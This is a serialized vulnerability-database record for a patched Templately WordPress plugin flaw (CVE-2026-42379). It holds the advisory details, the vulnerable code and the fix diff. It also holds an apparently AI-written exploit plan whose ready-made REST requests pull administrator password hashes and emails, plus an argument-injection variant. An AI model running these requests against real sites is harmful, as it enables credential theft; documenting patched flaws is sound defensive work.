[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f7ZMcTvC30QDi4KWe5bpD10YkcYJuOQgg4iRw5Z6lF5k":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-42379","templately-elementor-gutenberg-template-library-6500-free-pro-ready-templates-and-cloud-authenticated-contributor-inform","Templately – Elementor & Gutenberg Template Library: 6500+ Free & Pro Ready Templates And Cloud! \u003C= 3.6.1 - Authenticated (Contributor+) Information Exposure","The Templately – Elementor & Gutenberg Template Library: 6500+ Free & Pro Ready Templates And Cloud! plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.6.1. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive user or configuration data.","templately",null,"\u003C=3.6.1","3.6.2","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:L\u002FI:N\u002FA:N","Exposure of Sensitive Information to an Unauthorized Actor","2026-04-27 00:00:00","2026-04-30 15:02:23",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F02b7bbdf-5cb9-4206-bee5-3b43f0f862ea?source=api-prod",4,[22,23,24,25,26,27,28,29],"README.txt","assets\u002Fcss\u002Ftailwind.css","assets\u002Fjs\u002Fchunks\u002Fsettings-vendor.js","assets\u002Fjs\u002Ftailwind.asset.php","assets\u002Fjs\u002Ftemplately.asset.php","assets\u002Fjs\u002Ftemplately.js","changelog.txt","includes\u002FAPI\u002FConditions.php","researched",false,3,"# Vulnerability Research Plan: CVE-2026-42379 (Information Exposure)\n\n## 1. Vulnerability Summary\nThe **Templately** plugin (up to version 3.6.1) contains an authenticated information exposure vulnerability within its REST API implementation. Specifically, the `autocomplete` method in the `Templately\\API\\Conditions` class allows authenticated users with \"Contributor\" level access or higher to extract sensitive user data (including email addresses and password hashes) by exploiting improper input validation and dynamic object property access.\n\nThe vulnerability exists because the `autocomplete-condition` endpoint accepts a `query` parameter where the `field` key is used directly to access properties of `WP_User` objects returned by `get_users()`.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-json\u002Ftemplately\u002Fv1\u002Fautocomplete-condition`\n- **Method:** `GET`\n- **Authentication:** Authenticated (Contributor+)\n- **Capability Check:** `current_user_can( $post_type_object->cap->edit_posts )` where `Source::CPT` is `templately_library`. Standard Contributors possess the `edit_posts` capability.\n- **Vulnerable Parameters:** \n    - `query[query_type]`: Set to `authors` to trigger user searching.\n    - `query[field]`: The sensitive `WP_User` property to extract (e.g., `user_email`, `user_pass`, `user_login`).\n    - `payload`: The search string to match users.\n\n## 3. Code Flow\n1. **Request Entry:** A `GET` request is made to `wp-json\u002Ftemplately\u002Fv1\u002Fautocomplete-condition`.\n2. **Permission Check:** `Templately\\API\\Conditions::permission_check` is called. It verifies if the user has the `edit_posts` capability for the Templately CPT (`templately_library`).\n3. **Route Handling:** `Templately\\API\\Conditions::autocomplete` is executed.\n4. **Input Processing:** \n    - The code retrieves `$query = $request->get_param( 'query' )`.\n    - It identifies the search type via `$type = $query['query_type']`.\n    - It identifies the target return field via `$by_field = $query['field']`.\n5. **Data Fetching:** When `$type` is `authors`, it calls `get_users( $args )`, returning an array of `WP_User` objects.\n6. **Information Sink:** The code iterates through the users:\n   ```php\n   foreach ( $data as $item ) {\n       $results[] = [\n           'label' => $item->{$data_key}, \u002F\u002F display_name\n           'value' => $item->{$by_field}  \u002F\u002F VULNERABLE: Dynamic property access\n       ];\n   }\n   ```\n   If `by_field` is `user_pass`, `$item->user_pass` returns the Bcrypt hash.\n\n## 4. Nonce Acquisition Strategy\nThe REST API requires a standard WordPress `wp_rest` nonce for authenticated requests.\n\n1. **Login:** Authenticate as a Contributor.\n2. **Navigate:** Go to the WordPress Dashboard (`\u002Fwp-admin\u002F`).\n3. **Extraction:** Use `browser_eval` to extract the nonce from the `wpApiSettings` global object provided by WordPress core.\n   - **Command:** `browser_eval(\"wpApiSettings.nonce\")`\n4. **Usage:** Include this nonce in the `X-WP-Nonce` header of the exploit request.\n\n## 5. Exploitation Strategy\n1. **Target Identification:** We will target the Admin user (ID 1) to extract their email and password hash.\n2. **Payload Construction:**\n   - `action`: `templately\u002Fv1\u002Fautocomplete-condition`\n   - `payload`: `admin` (to search for the admin account)\n   - `query[query_type]`: `authors`\n   - `query[field]`: `user_pass` (to get the hash)\n3. **Execution:**\n   - Use `http_request` as the Contributor.\n   - Method: `GET`\n   - Headers: `X-WP-Nonce: [EXTRACTED_NONCE]`\n   - URL: `\u002Fwp-json\u002Ftemplately\u002Fv1\u002Fautocomplete-condition?payload=admin&query[query_type]=authors&query[field]=user_pass`\n\n## 6. Test Data Setup\n1. **Create Victim Admin:** Ensure an admin user exists with a known username (e.g., `admin`).\n2. **Create Attacker Contributor:**\n   - Username: `attacker`\n   - Password: `password123`\n   - Role: `contributor`\n3. **Plugin State:** Ensure the **Templately** plugin (\u003C= 3.6.1) is installed and activated.\n\n## 7. Expected Results\nA successful exploit will return a JSON response containing an array of objects. Each object will contain the `display_name` of matched users and the sensitive data requested in the `value` field.\n\n**Example Response:**\n```json\n{\n    \"success\": true,\n    \"data\": [\n        {\n            \"label\": \"Site Administrator\",\n            \"value\": \"$P$ByY7...\" \n        }\n    ]\n}\n```\n\n## 8. Verification Steps\n1. **Check Response:** Confirm the `value` field contains a string starting with `$P$` or `$2y$` (standard WordPress\u002FPHP password hashes).\n2. **WP-CLI Validation:** Compare the extracted hash with the actual hash in the database.\n   - **Command:** `wp user get 1 --field=user_pass`\n3. **Email Extraction:** Repeat the exploit with `query[field]=user_email` and verify it matches `wp user get 1 --field=user_email`.\n\n## 9. Alternative Approaches\n- **Bulk Extraction:** If the search `$payload` is set to an empty string or a single common character (like `a`), the plugin might return multiple users depending on `get_users` defaults.\n- **Argument Injection:** Since `$query['query']` is passed to `wp_parse_args` and used in `get_users($args)`, an attacker can override query parameters like `role` or `include` to target specific users:\n    - URL: `\u002Fwp-json\u002Ftemplately\u002Fv1\u002Fautocomplete-condition?payload=&query[query_type]=authors&query[field]=user_pass&query[query][role]=administrator`","The Templately plugin for WordPress is vulnerable to Sensitive Information Exposure via the 'autocomplete-condition' REST API endpoint due to improper validation of the 'field' parameter. Authenticated attackers with Contributor-level access or higher can exploit this to extract sensitive user data, including password hashes and email addresses, by performing dynamic property access on WP_User objects.","\u002F\u002F includes\u002FAPI\u002FConditions.php lines 122-132\n\t\t$by_field = $query['field'] ?? '';\n\n\t\tif ( empty( $by_field ) ) {\n\t\t\t\u002F\u002F FIXME: need throw error maybe\n\t\t\treturn $this->success( [] );\n\t\t}\n\n---\n\n\u002F\u002F includes\u002FAPI\u002FConditions.php lines 166-172\n\t\tif ( ! empty( $data ) && is_array( $data ) ) {\n\t\t\tforeach ( $data as $item ) {\n\t\t\t\t$results[] = [ \n\t\t\t\t\t'label' => $item->{$data_key},\n\t\t\t\t\t'value' => $item->{$by_field}\n\t\t\t\t];\n\t\t\t}\n\t\t}","--- includes\u002FAPI\u002FConditions.php\n+++ includes\u002FAPI\u002FConditions.php\n@@ -128,6 +128,11 @@\n \t\t\treturn $this->success( [] );\n \t\t}\n \n+\t\t$allowed_fields = [ 'ID', 'post_title', 'name', 'user_login', 'term_id', 'slug' ];\n+\t\tif ( ! in_array( $by_field, $allowed_fields ) ) {\n+\t\t\treturn $this->success( [] );\n+\t\t}\n+\n \t\t$payload = sanitize_text_field( $request->get_param( 'payload' ) );\n \t\t$args    = [ 'search' => $payload ];","1. Authenticate to the WordPress site as a user with at least Contributor-level privileges.\n2. Extract the current WordPress REST API nonce from the 'wpApiSettings' object in the dashboard source code.\n3. Construct a GET request to the '\u002Fwp-json\u002Ftemplately\u002Fv1\u002Fautocomplete-condition' endpoint.\n4. In the request parameters, set 'query[query_type]' to 'authors' to trigger a user search.\n5. Set the 'query[field]' parameter to 'user_pass' to target password hashes, or 'user_email' for email addresses.\n6. Provide a search string (e.g., 'admin') in the 'payload' parameter to identify the target user account.\n7. The plugin will execute 'get_users' and return an array where the 'value' key contains the sensitive data corresponding to the requested 'field'.","gemini-3-flash-preview","2026-05-04 18:27:30","2026-05-04 18:28:02",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","3.6.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ftemplately\u002Ftags\u002F3.6.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ftemplately.3.6.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ftemplately\u002Ftags\u002F3.6.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ftemplately.3.6.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ftemplately\u002Ftags"]